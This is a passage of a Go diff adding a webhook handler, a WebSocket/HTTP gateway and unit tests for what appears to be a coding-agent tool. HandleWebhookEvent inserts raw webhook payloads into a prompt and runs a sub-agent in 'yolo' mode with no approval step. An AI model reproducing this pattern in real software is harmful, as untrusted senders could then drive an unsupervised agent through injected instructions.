+func (h *WebhookHandler) HandleWebhookEvent(ctx context.Context, route webhook.RouteConfig, payload []byte) error {
+	if h.dispatcher.agentMgr == nil {
+		return fmt.Errorf("webhook requires --multi-agent mode")
+	}
+
+	// Build prompt from webhook event
+	prompt := fmt.Sprintf("Process this webhook event (route: %s, skill: %s):\n\n%s",
+		route.Path, route.Skill, string(payload))
+
+	// Create a sub-agent to handle the task
+	a, err := h.dispatcher.agentMgr.Create(agent.AgentOptions{
+		Mode:    "yolo",
+		WorkDir: h.dispatcher.cfg.GetWorkDir(),
+	})
+	if err != nil {
+		return fmt.Errorf("create webhook agent: %w", err)
+	}
+
+	// Run agent and collect result
+	ch := a.Run(ctx, prompt)
+	var result string
+	var lastErr error
+	for ev := range ch {
+		if ev.Error != nil {
+			lastErr = ev.Error
+		}
+		// Collect text deltas from the underlying agent loop events
+		if ev.TextDelta != "" {
+			result += ev.TextDelta
+		}
+	}
+
+	// Clean up
+	h.dispatcher.agentMgr.Destroy(a.ID())
+
+	if lastErr != nil {
+		return fmt.Errorf("webhook agent error: %w", lastErr)
+	}
+
+	// Deliver result if configured
+	if route.Delivery != "" && result != "" {
+		h.deliverResult(route.Delivery, route.DeliveryTarget, result)
+	}
+
+	log.Printf("[webhook] Task completed for route %s (result len=%d)", route.Path, len(result))
+	return nil
+}
+
+// deliverResult sends the result to the configured messaging platform.
+func (h *WebhookHandler) deliverResult(platform, target, result string) {
+	p, ok := h.platforms[platform]
+	if !ok {
+		log.Printf("[webhook] Delivery platform %q not found", platform)
+		return
+	}
+	if target == "" {
+		log.Printf("[webhook] Delivery target missing for %s", platform)
+		return
+	}
+	if err := p.SendMessage(context.Background(), target, result); err != nil {
+		log.Printf("[webhook] Delivery error to %s: %v", platform, err)
+	}
+}
diff --git a/internal/hermes/webhook_handler_test.go b/internal/hermes/webhook_handler_test.go
new file mode 100644
index 0000000..f8e1f80
--- /dev/null
+++ b/internal/hermes/webhook_handler_test.go
@@ -0,0 +1,70 @@
+package hermes
+
+import (
+	"context"
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+func TestWebhookHandlerRequiresMultiAgent(t *testing.T) {
+	d := &Dispatcher{agentMgr: nil}
+	h := NewWebhookHandler(d, nil)
+
+	route := webhook.RouteConfig{Path: "/test", Skill: "test"}
+	err := h.HandleWebhookEvent(nil, route, []byte(`{}`))
+	if err == nil {
+		t.Error("expected error when agentMgr is nil")
+	}
+}
+
+func TestWebhookHandlerDeliverResultUsesTarget(t *testing.T) {
+	platform := &mockPlatform{}
+	h := NewWebhookHandler(nil, map[string]messaging.Platform{
+		"feishu": platform,
+	})
+
+	h.deliverResult("feishu", "chat_123", "done")
+
+	if platform.chatID != "chat_123" {
+		t.Fatalf("chatID = %q, want chat_123", platform.chatID)
+	}
+	if platform.text != "done" {
+		t.Fatalf("text = %q, want done", platform.text)
+	}
+}
+
+func TestWebhookHandlerDeliverResultRequiresTarget(t *testing.T) {
+	platform := &mockPlatform{}
+	h := NewWebhookHandler(nil, map[string]messaging.Platform{
+		"feishu": platform,
+	})
+
+	h.deliverResult("feishu", "", "done")
+
+	if platform.called {
+		t.Fatal("expected SendMessage not to be called without delivery target")
+	}
+}
+
+type mockPlatform struct {
+	called bool
+	chatID string
+	text   string
+}
+
+func (p *mockPlatform) Name() string { return "mock" }
+
+func (p *mockPlatform) Start(ctx context.Context, handler messaging.MessageHandler) error { return nil }
+
+func (p *mockPlatform) Stop() error { return nil }
+
+func (p *mockPlatform) SendMessage(ctx context.Context, chatID string, text string) error {
+	p.called = true
+	p.chatID = chatID
+	p.text = text
+	return nil
+}
+
+func (p *mockPlatform) IsConnected() bool { return true }
diff --git a/internal/hermes/ws/api.go b/internal/hermes/ws/api.go
new file mode 100644
index 0000000..3b83a3b
--- /dev/null
+++ b/internal/hermes/ws/api.go
@@ -0,0 +1,186 @@
+package ws
+
+import (
+	"encoding/json"
+	"net/http"
+	"strings"
+	"time"
+)
+
+// --- HTTP REST API handlers ---
+
+// handleHealth returns server health status (no auth required).
+func (gw *Gateway) handleHealth(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	writeJSON(w, http.StatusOK, map[string]any{
+		"status":         "ok",
+		"version":        gw.version,
+		"uptime_seconds": int(time.Since(gw.startTime).Seconds()),
+	})
+}
+
+// handleStatus returns detailed server status.
+func (gw *Gateway) handleStatus(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	platformProvider := gw.platforms
+	gw.mu.RUnlock()
+
+	sessionCount := 0
+	if dispatcher != nil {
+		sessionCount = len(dispatcher.ListSessions())
+	}
+
+	var platforms []PlatformStatus
+	if platformProvider != nil {
+		platforms = platformProvider.GetPlatformStatuses()
+	}
+
+	writeJSON(w, http.StatusOK, map[string]any{
+		"version":        gw.version,
+		"uptime_seconds": int(time.Since(gw.startTime).Seconds()),
+		"sessions": map[string]int{
+			"active":      sessionCount,
+			"connections": gw.ConnectionCount(),
+		},
+		"platforms": platforms,
+	})
+}
+
+// handleSessions lists or manages sessions.
+func (gw *Gateway) handleSessions(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "dispatcher not ready"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		sessions := dispatcher.ListSessions()
+		writeJSON(w, http.StatusOK, map[string]any{
+			"sessions": sessions,
+		})
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handleSessionByID handles GET/DELETE for a specific session.
+func (gw *Gateway) handleSessionByID(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "dispatcher not ready"})
+		return
+	}
+
+	// Extract session ID from path: /api/sessions/{id}
+	path := strings.TrimPrefix(r.URL.Path, "/api/sessions/")
+	if path == "" {
+		writeJSON(w, http.StatusBadRequest, map[string]string{"error": "session ID required"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		sessions := dispatcher.ListSessions()
+		for _, s := range sessions {
+			if s.ID == path {
+				writeJSON(w, http.StatusOK, s)
+				return
+			}
+		}
+		writeJSON(w, http.StatusNotFound, map[string]string{"error": "session not found"})
+
+	case http.MethodDelete:
+		dispatcher.RemoveSession(path)
+		writeJSON(w, http.StatusOK, map[string]any{
+			"message": "session deleted",
+			"id":      path,
+		})
+
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handleMemory handles memory.md read/write.
+func (gw *Gateway) handleMemory(w http.ResponseWriter, r *http.Request) {
+	gw.mu.RLock()
+	memStore := gw.memoryStore
+	gw.mu.RUnlock()
+
+	if memStore == nil {
+		writeJSON(w, http.StatusServiceUnavailable, map[string]string{"error": "memory store not configured"})
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		content, path, source, err := memStore.Read()
+		if err != nil {
+			writeJSON(w, http.StatusInternalServerError, map[string]string{"error": err.Error()})
+			return
+		}
+		writeJSON(w, http.StatusOK, map[string]any{
+			"path":    path,
+			"source":  source,
+			"content": content,
+		})
+
+	case http.MethodPut:
+		var body struct {
+			Content string `json:"content"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
+			writeJSON(w, http.StatusBadRequest, map[string]string{"error": "invalid JSON body"})
+			return
+		}
+		if err := memStore.WriteAll(body.Content); err != nil {
+			writeJSON(w, http.StatusInternalServerError, map[string]string{"error": err.Error()})
+			return
+		}
+		writeJSON(w, http.StatusOK, map[string]string{"message": "memory updated"})
+
+	default:
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+// handlePlatforms returns messaging platform statuses.
+func (gw *Gateway) handlePlatforms(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	gw.mu.RLock()
+	platformProvider := gw.platforms
+	gw.mu.RUnlock()
+
+	var platforms []PlatformStatus
+	if platformProvider != nil {
+		platforms = platformProvider.GetPlatformStatuses()
+	}
+	if platforms == nil {
+		platforms = []PlatformStatus{}
+	}
+
+	writeJSON(w, http.StatusOK, map[string]any{
+		"platforms": platforms,
+	})
+}
diff --git a/internal/hermes/ws/handler.go b/internal/hermes/ws/handler.go
new file mode 100644
index 0000000..132eaa8
--- /dev/null
+++ b/internal/hermes/ws/handler.go
@@ -0,0 +1,235 @@
+package ws
+
+import (
+	"context"
+	"crypto/rand"
+	"encoding/hex"
+	"fmt"
+	"log"
+	"net/http"
+	"sync"
+	"time"
+
+	"golang.org/x/net/websocket"
+)
+
+// WSEvent is the event type sent over WebSocket.
+// Mapped from agent.Event by the dispatcher.
+type WSEvent struct {
+	Type    string `json:"type"`
+	Content string `json:"content,omitempty"`
+
+	// Connected event fields
+	SessionID string `json:"session_id,omitempty"`
+	Version   string `json:"version,omitempty"`
+	Model     string `json:"model,omitempty"`
+	WorkDir   string `json:"work_dir,omitempty"`
+
+	// Tool event fields
+	Tool   string         `json:"tool,omitempty"`
+	CallID string         `json:"call_id,omitempty"`
+	Args   map[string]any `json:"args,omitempty"`
+	Result string         `json:"result,omitempty"`
+
+	// Diff fields
+	Path string `json:"path,omitempty"`
+	Diff string `json:"diff,omitempty"`
+
+	// Approval fields
+	ApprovalID string `json:"approval_id,omitempty"`
+	RiskLevel  string `json:"risk_level,omitempty"`
+	Approved   bool   `json:"approved,omitempty"`
+
+	// Plan fields
+	Plan *PlanData `json:"plan,omitempty"`
+
+	// Usage fields
+	PromptTokens     int `json:"prompt_tokens,omitempty"`
+	CompletionTokens int `json:"completion_tokens,omitempty"`
+	TotalTokens      int `json:"total_tokens,omitempty"`
+	CacheReadTokens  int `json:"cache_read_tokens,omitempty"`
+	CacheWriteTokens int `json:"cache_write_tokens,omitempty"`
+
+	// Done/Error fields
+	StopReason string `json:"stop_reason,omitempty"`
+	Message    string `json:"message,omitempty"`
+	Command    string `json:"command,omitempty"`
+	Error      bool   `json:"error,omitempty"`
+	Code       string `json:"code,omitempty"`
+}
+
+// PlanData represents a task plan for the plan_update event.
+type PlanData struct {
+	Title string     `json:"title"`
+	Steps []PlanStep `json:"steps"`
+}
+
+// PlanStep is a single step in a task plan.
+type PlanStep struct {
+	Title  string `json:"title"`
+	Status string `json:"status"`
+}
+
+// ClientMessage represents a message from the WebSocket client.
+type ClientMessage struct {
+	Type       string `json:"type"`
+	Content    string `json:"content,omitempty"`
+	ApprovalID string `json:"approval_id,omitempty"`
+	Approved   bool   `json:"approved,omitempty"`
+}
+
+// WSConn wraps a WebSocket connection with metadata.
+type WSConn struct {
+	ID     string
+	ws     *websocket.Conn
+	sendMu sync.Mutex
+	closed bool
+	mu     sync.Mutex
+}
+
+// Send sends a WSEvent to the client.
+func (c *WSConn) Send(ev WSEvent) error {
+	c.sendMu.Lock()
+	defer c.sendMu.Unlock()
+	c.mu.Lock()
+	if c.closed {
+		c.mu.Unlock()
+		return nil
+	}
+	c.mu.Unlock()
+	return websocket.JSON.Send(c.ws, ev)
+}
+
+// Close closes the WebSocket connection.
+func (c *WSConn) Close() {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	if !c.closed {
+		c.closed = true
+		c.ws.Close()
+	}
+}
+
+// handleWebSocket handles WebSocket upgrade and message loop.
+func (gw *Gateway) handleWebSocket(w http.ResponseWriter, r *http.Request) {
+	// Auth check
+	if gw.authToken != "" {
+		if !gw.validToken(requestAuthToken(r)) {
+			http.Error(w, "unauthorized", http.StatusUnauthorized)
+			return
+		}
+	}
+
+	handler := websocket.Handler(func(ws *websocket.Conn) {
+		connID := generateConnID()
+		conn := &WSConn{
+			ID: connID,
+			ws: ws,
+		}
+
+		// Register connection
+		gw.connMu.Lock()
+		gw.conns[connID] = conn
+		gw.connMu.Unlock()
+
+		defer func() {
+			conn.Close()
+			gw.connMu.Lock()
+			delete(gw.conns, connID)
+			gw.connMu.Unlock()
+		}()
+
+		// Send connected event
+		conn.Send(WSEvent{
+			Type:      "connected",
+			SessionID: "hermes/ws/" + connID,
+			Version:   gw.version,
+		})
+
+		log.Printf("WebSocket client connected: %s", connID)
+
+		// Message loop
+		for {
+			var msg ClientMessage
+			if err := websocket.JSON.Receive(ws, &msg); err != nil {
+				log.Printf("WebSocket read error (%s): %v", connID, err)
+				return
+			}
+
+			switch msg.Type {
+			case "ping":
+				conn.Send(WSEvent{Type: "pong"})
+
+			case "message", "command":
+				text := msg.Content
+				if msg.Type == "command" && text != "" && text[0] != '/' {
+					text = "/" + text
+				}
+				gw.handleWSChat(r.Context(), conn, connID, text)
+
+			case "approval":
+				if msg.ApprovalID != "" && gw.dispatcher != nil {
+					gw.dispatcher.ResolveApproval(msg.ApprovalID, msg.Approved)
+				}
+				conn.Send(WSEvent{Type: "status", Message: fmt.Sprintf("Approval %s: %v", msg.ApprovalID, msg.Approved)})
+
+			default:
+				conn.Send(WSEvent{
+					Type:    "error",
+					Message: "unknown message type: " + msg.Type,
+				})
+			}
+		}
+	})
+
+	handler.ServeHTTP(w, r)
+}
+
+// handleWSChat dispatches a chat message and streams events back.
+func (gw *Gateway) handleWSChat(ctx context.Context, conn *WSConn, connID, text string) {
+	gw.mu.RLock()
+	dispatcher := gw.dispatcher
+	gw.mu.RUnlock()
+
+	if dispatcher == nil {
+		conn.Send(WSEvent{Type: "error", Message: "dispatcher not ready"})
+		return
+	}
+
+	eventCh := make(chan WSEvent, 100)
+	go func() {
+		defer close(eventCh)
+		if err := dispatcher.HandleWSMessage(ctx, connID, text, eventCh); err != nil {
+			eventCh <- WSEvent{Type: "error", Message: err.Error()}
+		}
+	}()
+
+	for ev := range eventCh {
+		if err := conn.Send(ev); err != nil {
+			log.Printf("WebSocket send error (%s): %v", connID, err)
+			return
+		}
+	}
+}
+
+// generateConnID generates a random connection ID.
+func generateConnID() string {
+	b := make([]byte, 8)
+	rand.Read(b)
+	return hex.EncodeToString(b)
+}
+
+// keepAlive sends periodic pings to keep the connection alive.
+func (c *WSConn) keepAlive(interval time.Duration) {
+	ticker := time.NewTicker(interval)
+	defer ticker.Stop()
+	for range ticker.C {
+		c.mu.Lock()
+		closed := c.closed
+		c.mu.Unlock()
+		if closed {
+			return
+		}
+		c.Send(WSEvent{Type: "pong"})
+	}
+}
diff --git a/internal/hermes/ws/server.go b/internal/hermes/ws/server.go
new file mode 100644
index 0000000..2d4701f
--- /dev/null
+++ b/internal/hermes/ws/server.go
@@ -0,0 +1,201 @@
+// Package ws implements the WebSocket + HTTP gateway for Hermes mode.
+package ws
+
+import (
+	"context"
+	"crypto/subtle"
+	"encoding/json"
+	"log"
+	"net/http"
+	"sync"
+	"time"
+)
+
+// Gateway is the WebSocket + HTTP gateway server.
+type Gateway struct {
+	mu          sync.RWMutex
+	mux         *http.ServeMux
+	httpServer  *http.Server
+	dispatcher  Dispatcher
+	platforms   PlatformStatusProvider
+	memoryStore MemoryStore
+	version     string
+	authToken   string
+	startTime   time.Time
+
+	// Active WebSocket connections
+	connMu sync.RWMutex
+	conns  map[string]*WSConn
+}
+
+// Dispatcher is the interface the gateway uses to dispatch messages.
+type Dispatcher interface {
+	HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- WSEvent) error
+	ListSessions() []SessionInfo
+	RemoveSession(key string)
+	ResolveApproval(approvalID string, approved bool) bool
+}
+
+// SessionInfo is a simplified session view for API responses.
+type SessionInfo struct {
+	ID           string    `json:"id"`
+	Platform     string    `json:"platform"`
+	UserID       string    `json:"user_id"`
+	WorkDir      string    `json:"work_dir"`
+	Mode         string    `json:"mode,omitempty"`
+	Model        string    `json:"model,omitempty"`
+	MessageCount int       `json:"message_count"`
+	LastActive   time.Time `json:"last_active"`
+	Preview      string    `json:"preview,omitempty"`
+}
+
+// PlatformStatus represents a messaging platform's connection status.
+type PlatformStatus struct {
+	Name        string   `json:"name"`
+	Enabled     bool     `json:"enabled"`
+	Connected   bool     `json:"connected"`
+	WorkDir     string   `json:"work_dir,omitempty"`
+	ActiveUsers []string `json:"active_users,omitempty"`
+	LoginStatus string   `json:"login_status,omitempty"`
+}
+
+// PlatformStatusProvider supplies platform connection status.
+type PlatformStatusProvider interface {
+	GetPlatformStatuses() []PlatformStatus
+}
+
+// NewGateway creates a new gateway server.
+func NewGateway(listenAddr, authToken, version string) *Gateway {
+	gw := &Gateway{
+		mux:       http.NewServeMux(),
+		version:   version,
+		authToken: authToken,
+		startTime: time.Now(),
+		conns:     make(map[string]*WSConn),
+	}
+
+	gw.httpServer = &http.Server{
+		Addr:         listenAddr,
+		Handler:      gw.mux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: 300 * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	// Register routes
+	gw.mux.HandleFunc("/ws", gw.handleWebSocket)
+	gw.mux.HandleFunc("/api/health", gw.handleHealth)
+	gw.mux.HandleFunc("/api/status", gw.withAuth(gw.handleStatus))
+	gw.mux.HandleFunc("/api/sessions", gw.withAuth(gw.handleSessions))
+	gw.mux.HandleFunc("/api/sessions/", gw.withAuth(gw.handleSessionByID))
+	gw.mux.HandleFunc("/api/memory", gw.withAuth(gw.handleMemory))
+	gw.mux.HandleFunc("/api/platforms", gw.withAuth(gw.handlePlatforms))
+
+	return gw
+}
+
+// RegisterHandler registers an additional HTTP handler on the gateway mux.
+func (gw *Gateway) RegisterHandler(pattern string, handler http.Handler) {
+	gw.mux.Handle(pattern, handler)
+}
+
+// SetDispatcher sets the message dispatcher.
+func (gw *Gateway) SetDispatcher(d Dispatcher) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.dispatcher = d
+}
+
+// SetPlatformStatusProvider sets the platform status provider.
+func (gw *Gateway) SetPlatformStatusProvider(p PlatformStatusProvider) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.platforms = p
+}
+
+// MemoryStore provides read/write access to memory.md.
+type MemoryStore interface {
+	Read() (content string, path string, source string, err error)
+	WriteAll(content string) error
+}
+
+// SetMemoryStore sets the memory store for the /api/memory endpoint.
+func (gw *Gateway) SetMemoryStore(s MemoryStore) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.memoryStore = s
+}
+
+// GetMux returns the HTTP mux for registering additional routes.
+func (gw *Gateway) GetMux() *http.ServeMux {
+	return gw.mux
+}
+
+// Start starts the HTTP server. Blocks until stopped.
+func (gw *Gateway) Start() error {
+	log.Printf("Hermes gateway listening on %s", gw.httpServer.Addr)
+	return gw.httpServer.ListenAndServe()
+}
+
+// Stop gracefully shuts down the gateway.
+func (gw *Gateway) Stop(timeout time.Duration) error {
+	ctx, cancel := context.WithTimeout(context.Background(), timeout)
+	defer cancel()
+
+	// Close all WebSocket connections
+	gw.connMu.Lock()
+	for _, conn := range gw.conns {
+		conn.Close()
+	}
+	gw.connMu.Unlock()
+
+	return gw.httpServer.Shutdown(ctx)
+}
+
+// ConnectionCount returns the number of active WebSocket connections.
+func (gw *Gateway) ConnectionCount() int {
+	gw.connMu.RLock()
+	defer gw.connMu.RUnlock()
+	return len(gw.conns)
+}
+
+// --- Auth middleware ---
+
+func (gw *Gateway) withAuth(handler http.HandlerFunc) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		if gw.authToken != "" {
+			if !gw.validToken(requestAuthToken(r)) {
+				writeJSON(w, http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+				return
+			}
+		}
+		handler(w, r)
+	}
+}
+
+func requestAuthToken(r *http.Request) string {
+	const prefix = "Bearer "
+	token := r.Header.Get("Authorization")
+	if len(token) > len(prefix) && token[:len(prefix)] == prefix {
+		return token[len(prefix):]
+	}
+	if token != "" {
+		return token
+	}
+	return r.URL.Query().Get("token")
+}
+
+func (gw *Gateway) validToken(token string) bool {
+	if token == "" || len(token) != len(gw.authToken) {
+		return false
+	}
+	return subtle.ConstantTimeCompare([]byte(token), []byte(gw.authToken)) == 1
+}
+
+// --- Helpers ---
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
diff --git a/internal/hermes/ws/server_test.go b/internal/hermes/ws/server_test.go
new file mode 100644
index 0000000..3106c61
--- /dev/null
+++ b/internal/hermes/ws/server_test.go
@@ -0,0 +1,374 @@
+package ws
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+)
+
+func TestNewGateway(t *testing.T) {
+	gw := NewGateway("localhost:8090", "test-token", "0.1.27")
+	if gw == nil {
+		t.Fatal("expected gateway")
+	}
+	if gw.version != "0.1.27" {
+		t.Errorf("expected version 0.1.27, got %s", gw.version)
+	}
+	if gw.authToken != "test-token" {
+		t.Errorf("expected token test-token, got %s", gw.authToken)
+	}
+}
+
+func TestGatewayConnectionCount(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+	if gw.ConnectionCount() != 0 {
+		t.Errorf("expected 0 connections, got %d", gw.ConnectionCount())
+	}
+}
+
+func TestHandleHealth(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/health", nil)
+	w := httptest.NewRecorder()
+	gw.handleHealth(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["status"] != "ok" {
+		t.Errorf("expected ok, got %v", result["status"])
+	}
+	if result["version"] != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %v", result["version"])
+	}
+}
+
+func TestHandleHealthMethodNotAllowed(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("POST", "/api/health", nil)
+	w := httptest.NewRecorder()
+	gw.handleHealth(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestHandleStatus(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/status", nil)
+	w := httptest.NewRecorder()
+	gw.handleStatus(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["version"] != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %v", result["version"])
+	}
+}
+
+func TestHandleSessions(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	// No dispatcher set
+	req := httptest.NewRequest("GET", "/api/sessions", nil)
+	w := httptest.NewRecorder()
+	gw.handleSessions(w, req)
+
+	if w.Code != http.StatusServiceUnavailable {
+		t.Errorf("expected 503, got %d", w.Code)
+	}
+}
+
+func TestHandleMemoryNoStore(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/memory", nil)
+	w := httptest.NewRecorder()
+	gw.handleMemory(w, req)
+
+	if w.Code != http.StatusServiceUnavailable {
+		t.Errorf("expected 503, got %d", w.Code)
+	}
+}
+
+func TestHandlePlatforms(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/platforms", nil)
+	w := httptest.NewRecorder()
+	gw.handlePlatforms(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	platforms, ok := result["platforms"].([]any)
+	if !ok {
+		t.Fatal("expected platforms array")
+	}
+	if len(platforms) != 0 {
+		t.Errorf("expected 0 platforms, got %d", len(platforms))
+	}
+}
+
+func TestWithAuthNoToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (no auth configured)")
+	}
+}
+
+func TestWithAuthValidToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer secret")
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (valid token)")
+	}
+}
+
+func TestRequestAuthTokenPrefersBearerHeader(t *testing.T) {
+	req := httptest.NewRequest("GET", "/test?token=query-secret", nil)
+	req.Header.Set("Authorization", "Bearer header-secret")
+
+	if got := requestAuthToken(req); got != "header-secret" {
+		t.Fatalf("requestAuthToken = %q, want header-secret", got)
+	}
+}
+
+func TestWithAuthInvalidToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer wrong")
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if called {
+		t.Error("expected handler NOT to be called (invalid token)")
+	}
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestWithAuthQueryToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test?token=secret", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (query token)")
+	}
+}
+
+func TestWithAuthNoAuthHeader(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if called {
+		t.Error("expected handler NOT to be called (no auth)")
+	}
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestSessionInfo(t *testing.T) {
+	info := SessionInfo{
+		ID:           "test-session",
+		Platform:     "ws",
+		UserID:       "user1",
+		WorkDir:      "/tmp",
+		Mode:         "yolo",
+		MessageCount: 5,
+		LastActive:   time.Now(),
+		Preview:      "hello",
+	}
+
+	if info.ID != "test-session" {
+		t.Errorf("expected test-session, got %s", info.ID)
+	}
+	if info.Platform != "ws" {
+		t.Errorf("expected ws, got %s", info.Platform)
+	}
+}
+
+func TestPlatformStatus(t *testing.T) {
+	status := PlatformStatus{
+		Name:        "wechat",
+		Enabled:     true,
+		Connected:   true,
+		WorkDir:     "/tmp",
+		ActiveUsers: []string{"user1", "user2"},
+		LoginStatus: "logged_in",
+	}
+
+	if status.Name != "wechat" {
+		t.Errorf("expected wechat, got %s", status.Name)
+	}
+	if len(status.ActiveUsers) != 2 {
+		t.Errorf("expected 2 users, got %d", len(status.ActiveUsers))
+	}
+}
+
+func TestWSEventSerialization(t *testing.T) {
+	ev := WSEvent{
+		Type:    "text_delta",
+		Content: "hello",
+		Tool:    "read",
+		CallID:  "tc_123",
+	}
+
+	data, err := json.Marshal(ev)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got WSEvent
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Type != "text_delta" {
+		t.Errorf("expected text_delta, got %s", got.Type)
+	}
+	if got.Content != "hello" {
+		t.Errorf("expected hello, got %s", got.Content)
+	}
+	if got.Tool != "read" {
+		t.Errorf("expected read, got %s", got.Tool)
+	}
+}
+
+func TestClientMessageSerialization(t *testing.T) {
+	msg := ClientMessage{
+		Type:       "approval",
+		ApprovalID: "ap_123",
+		Approved:   true,
+	}
+
+	data, err := json.Marshal(msg)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got ClientMessage
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Type != "approval" {
+		t.Errorf("expected approval, got %s", got.Type)
+	}
+	if !got.Approved {
+		t.Error("expected approved=true")
+	}
+}
+
+func TestPlanDataSerialization(t *testing.T) {
+	plan := PlanData{
+		Title: "Test Plan",
+		Steps: []PlanStep{
+			{Title: "Step 1", Status: "done"},
+			{Title: "Step 2", Status: "running"},
+		},
+	}
+
+	data, err := json.Marshal(plan)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got PlanData
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Title != "Test Plan" {
+		t.Errorf("expected Test Plan, got %s", got.Title)
+	}
